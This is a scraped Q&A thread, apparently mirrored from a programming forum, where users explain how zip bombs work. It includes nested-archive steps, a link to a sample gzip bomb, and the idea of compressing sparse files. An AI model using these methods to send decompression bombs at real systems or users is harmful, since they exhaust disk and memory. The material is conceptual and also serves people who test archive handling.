How does one make a Zip bomb?

前端 未结 14 1508
佛祖请我去吃肉
佛祖请我去吃肉 2020-12-12 11:13

This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 kb zip file that decompresses to 1.3 exabytes.

相关标签:
14条回答
  • 2020-12-12 11:22

    Serious answer:

    (Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

    0x100000000000000000000000000000000000  
    (Repeat this '0' ten trillion times)
    

    Very short zip file, but huge when you expand it.

    0 讨论(0)
  • 2020-12-12 11:22

    Perhaps, on unix, you could pipe a certain amount of zeros directly into a zip program or something? Don't know enough about unix to explain how you would do that though. Other than that you would need a source of zeros, and pipe them into a zipper that read from stdin or something...

    0 讨论(0)
  • 2020-12-12 11:25

    Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be.

    1. Create a dummy file with zeros (or ones if you think they're skinny) of size (say 1 GB).
    2. Compress this file to a zip-file say 1.zip.
    3. Make n (say 10) copies of this file and add these 10 files to a compressed archive (say 2.zip).
    4. Repeat step 3 k number of times.
    5. You'll get a zip bomb.

    For a Python implementation, check this.

    0 讨论(0)
  • 2020-12-12 11:30

    A nice way to create a zipbomb (or gzbomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming file (for example using /dev/zero) you'll still be limited by computing power needed to compress the stream.

    A nice example of a gzip bomb: http://selenic.com/googolplex.gz57 (there's a message embedded in the file after several level of compression resulting in huge files)

    Have fun finding that message :)

    0 讨论(0)
  • 2020-12-12 11:31

    To create one in a practical setting (i.e. without creating a 1.3 exabyte file on you enormous harddrive), you would probably have to learn the file format at a binary level and write something that translates to what your desired file would look like, post-compression.

    0 讨论(0)
  • 2020-12-12 11:33

    Recent (post 1995) compression algorithms like bz2, lzma (7-zip) and rar give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content to a managable size.

    Another approach could be to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (eg tar), now if the examiner streams the file the examiner will need to read past all those zeros that exist only to pad between the actual content of the file, if the examiner writes it to disk however very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).

    0 讨论(0)
提交回复
热议问题